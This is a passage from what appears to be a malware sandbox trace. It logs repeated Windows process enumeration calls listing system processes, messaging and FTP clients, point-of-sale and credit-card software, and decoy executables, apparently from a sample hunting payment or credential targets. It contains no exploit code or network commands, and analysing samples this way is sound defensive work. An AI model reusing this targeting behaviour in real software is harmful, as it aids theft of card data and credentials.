pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0210.115] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0210.119] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0210.123] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0210.131] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0210.134] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0210.136] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0210.138] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0210.140] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0210.143] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0210.146] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0210.149] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0210.155] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0210.159] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0210.162] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0210.165] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0210.170] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0210.172] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0210.174] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0210.178] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0210.180] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0210.183] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0210.185] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0210.187] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0210.189] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0210.192] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0210.195] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0210.199] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0210.202] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0210.205] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0210.214] Process32Next (in: hSnapshot=0x2110, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0210.217] CloseHandle (hObject=0x2110) returned 1 [0210.217] Sleep (dwMilliseconds=0x64) [0210.345] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20fc [0210.362] Process32First (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.365] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0210.368] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0210.371] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0210.373] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0210.375] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0210.378] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0210.421] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0210.424] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0210.429] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.432] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.434] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0210.436] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.439] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.441] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.443] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.446] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.448] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.450] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.453] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0210.455] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0210.457] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0210.516] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0210.519] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.521] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0210.524] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0210.526] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0210.529] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0210.531] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0210.533] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0210.536] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.538] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0210.543] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0210.546] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0210.548] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.551] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0210.618] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0210.621] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0210.626] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0210.628] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0210.631] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0210.633] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0210.636] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0210.638] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0210.640] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0210.643] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0210.646] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0210.648] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0210.650] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0210.653] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0210.655] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0210.660] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0210.663] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0210.669] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, 